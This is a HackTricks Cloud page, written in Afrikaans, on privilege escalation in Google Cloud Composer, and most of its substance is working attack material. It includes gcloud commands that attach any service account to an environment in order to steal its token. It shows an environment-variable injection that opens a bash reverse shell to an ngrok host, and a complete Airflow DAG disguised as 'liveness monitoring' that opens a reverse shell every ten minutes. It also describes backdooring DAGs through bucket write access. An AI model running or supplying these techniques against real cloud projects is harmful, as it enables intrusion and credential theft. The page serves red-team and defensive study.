GCP - Composer Privesc

Leer & oefen AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Leer & oefen GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Ondersteun HackTricks

Kyk na die subskripsie planne!
Sluit aan by die 💬 Discord groep of die telegram groep of volg ons op Twitter 🐦 @hacktricks_live.
Deel hacking truuks deur PRs in te dien na die HackTricks en HackTricks Cloud github repos.

composer

Meer inligting in:

GCP - Composer Enum

`composer.environments.create`

Dit is moontlik om enige diensrekening aan die nuut geskepte composer omgewing met daardie toestemming te koppel. Later kan jy kode binne composer uitvoer om die diensrekening token te steel.

gcloud composer environments create privesc-test \
--project "${PROJECT_ID}" \
--location europe-west1 \
--service-account="${ATTACK_SA}@${PROJECT_ID}.iam.gserviceaccount.com"

Meer inligting oor die uitbuiting hier.

`composer.environments.update`

Dit is moontlik om die composer-omgewing op te dateer, byvoorbeeld, om omgewing veranderlikes te wysig:

# Even if it says you don't have enough permissions the update happens
gcloud composer environments update \
projects/<project-id>/locations/<location>/environments/<composer-env-name> \
--update-env-variables="PYTHONWARNINGS=all:0:antigravity.x:0:0,BROWSER=/bin/bash -c 'bash -i >& /dev/tcp/2.tcp.eu.ngrok.io/19990 0>&1' & #%s" \
--location <location> \
--project <project-id>

# Call the API endpoint directly
PATCH /v1/projects/<project-id>/locations/<location>/environments/<composer-env-name>?alt=json&updateMask=config.software_config.env_variables HTTP/2
Host: composer.googleapis.com
User-Agent: google-cloud-sdk gcloud/480.0.0 command/gcloud.composer.environments.update invocation-id/826970373cd441a8801d6a977deba693 environment/None environment-version/None client-os/MACOSX client-os-ver/23.4.0 client-pltf-arch/arm interactive/True from-script/False python/3.12.3 term/xterm-256color (Macintosh; Intel Mac OS X 23.4.0)
Accept-Encoding: gzip, deflate, br
Accept: application/json
Content-Length: 178
Content-Type: application/json
X-Goog-Api-Client: cred-type/sa
Authorization: Bearer [token]
X-Allowed-Locations: 0x0

{"config": {"softwareConfig": {"envVariables": {"BROWSER": "/bin/bash -c 'bash -i >& /dev/tcp/2.tcp.eu.ngrok.io/1890 0>&1' & #%s", "PYTHONWARNINGS": "all:0:antigravity.x:0:0"}}}}

TODO: Kry RCE deur nuwe pypi-pakkette by die omgewing te voeg

Laai Dags Af

Kontroleer die bronkode van die dags wat uitgevoer word:

mkdir /tmp/dags
gcloud composer environments storage dags export --environment <environment> --location <loc> --destination /tmp/dags

Importeer Dags

Voeg die python DAG-kode in 'n lêer in en importeer dit deur te loop:

# TODO: Create dag to get a rev shell
gcloud composer environments storage dags import --environment test --location us-central1 --source /tmp/dags/reverse_shell.py

Reverse shell DAG:

reverse_shell.py

import airflow
from airflow import DAG
from airflow.operators.bash_operator import BashOperator
from datetime import timedelta

default_args = {
'start_date': airflow.utils.dates.days_ago(0),
'retries': 1,
'retry_delay': timedelta(minutes=5)
}

dag = DAG(
'reverse_shell',
default_args=default_args,
description='liveness monitoring dag',
schedule_interval='*/10 * * * *',
max_active_runs=1,
catchup=False,
dagrun_timeout=timedelta(minutes=10),
)

# priority_weight has type int in Airflow DB, uses the maximum.
t1 = BashOperator(
task_id='bash_rev',
bash_command='bash -i >& /dev/tcp/0.tcp.eu.ngrok.io/14382 0>&1',
dag=dag,
depends_on_past=False,
priority_weight=2**31 - 1,
do_xcom_push=False)

Skryf Toegang tot die Composer-bucket

Alle komponente van 'n composer-omgewing (DAGs, plugins en data) word binne 'n GCP-bucket gestoor. As die aanvaller lees- en skryfregte daaroor het, kan hy die bucket monitor en wanneer 'n DAG geskep of opgedateer word, 'n backdoored weergawe indien sodat die composer-omgewing die backdoored weergawe uit die berging sal kry.

Kry meer inligting oor hierdie aanval in:

GCP - Storage Privesc

Importeer Plugins

TODO: Kyk wat moontlik is om te kompromitteer deur plugins op te laai

Importeer Data

TODO: Kyk wat moontlik is om te kompromitteer deur data op te laai

Ondersteun HackTricks

Kyk na die subskripsieplanne!
Sluit aan by die 💬 Discord-groep of die telegram-groep of volg ons op Twitter 🐦 @hacktricks_live.
Deel hacking truuks deur PRs in te dien na die HackTricks en HackTricks Cloud github repos.

PreviousGCP - Add Custom SSH Metadata NextGCP - Container Privesc

Last updated 3 days ago